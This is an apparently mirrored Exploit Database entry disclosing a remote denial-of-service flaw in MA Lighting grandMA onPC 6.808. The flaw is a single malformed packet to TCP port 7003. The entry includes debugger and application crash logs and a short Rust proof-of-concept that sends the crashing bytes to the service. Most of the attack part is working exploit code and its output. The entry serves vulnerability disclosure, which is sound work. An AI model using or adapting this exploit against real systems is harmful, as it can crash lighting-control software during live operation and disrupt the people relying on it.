MA Lighting Technology grandMA onPC 6.808 – Remote Denial of Service

• Exploit Database
• 124 阅读

• 作者： LiquidWorm
  日期： 2014-04-05
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/32704/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89

  /*   MA Lighting Technology grandMA onPC v6.808 Remote Denial of Service Exploit     Vendor: MA Lighting Technology GmbH Product web page: http://www.malighting.com Affected version: grandMA series 1 onPC Software 6.808 (6.801)   Summary: The grandMA onPC software incorporates all functions of a grandMA console and offers you its full potential on your notebook or PC. You can use grandMA onPC for running, programming or offline pre-programming, as well as a smart backup solution within the grandMA system. With the MA onPC command wing and MA onPC fader wing MA Lighting has developed a sophisticated hardware extension perfectly suited for the grandMA onPC software.   Desc: grandMA onPC version 6.808 is exposed to a remote denial of service issue when processing socket connection negotiation. This issue occurs when the application handles a single malformed packet over TCP port 7003, resulting in a crash.   ===========================================================================   (1324.be4): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=3535393f ebx=07279f80 ecx=35353937 edx=0c05f038 esi=3535393f edi=3535393b eip=77ce22c2 esp=0c05ef7c ebp=0c05ef90 iopl=0 nv up ei pl nz ac pe nc cs=0023ss=002bds=002bes=002bfs=0053gs=002b efl=00010216 ntdll!RtlEnterCriticalSection+0x12: 77ce22c2 f00fba3000lock btr dword ptr [eax],0 ds:002b:3535393f=????????   --   303.640 GMA : RR NEWSTATION IN NETWORK 127.0.0.1(100) AS Standalone 367.147 SHAR: RPC COMMAND UNSUPPORTED CMD 542393671 from 127.0.0.1 367.147 SHAR: SHARED_REMOTECALL NOT TERMINATED CORRECTLY ! 367.180 CC: ******* EXCEPTION ************************** 367.180 CC: * ACCESS_VIOLATION 367.180 CC: * EAX = 37363341EBX =6D856B0 367.180 CC: * ECX = 37363339EDX =B78F41C 367.180 CC: * ESI = 37363341EDI = 3736333D 367.180 CC: * DESKTYP : GMA [Windows] 367.180 CC: * VERSION : 6.808 STREAMING : 6801 367.180 CC: ******************************************** 367.240 CC: 0x775522c2 RtlEnterCriticalSection() + 0x12   ===========================================================================     Tested on: Microsoft Windows 7 Professional SP1 (EN)     Vulnerability discovered by Gjoko &apos;LiquidWorm&apos; Krstic @zeroscience     Advisory ID: ZSL-2014-5183 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5183.php     31.03.2014   */     use std::io::net::ip::SocketAddr; use std::io::net::tcp::TcpStream;   fn bann() { println!(" +======================================+ | grandMA onPC 6.808 Denial of Service | |--------------------------------------| || | ID: ZSL-2014-5183| +======================================+ "); }   fn main() { bann(); println!("\n[*] Sending packet to local host on tcp port 7003\n"); let addr = from_str::<SocketAddr>("127.0.0.1:7003").unwrap(); let mut socket = TcpStream::connect(addr).unwrap(); socket.write(bytes!("\x74\x30\x30\x74\x21")); println!("[*] Crashed!\n"); }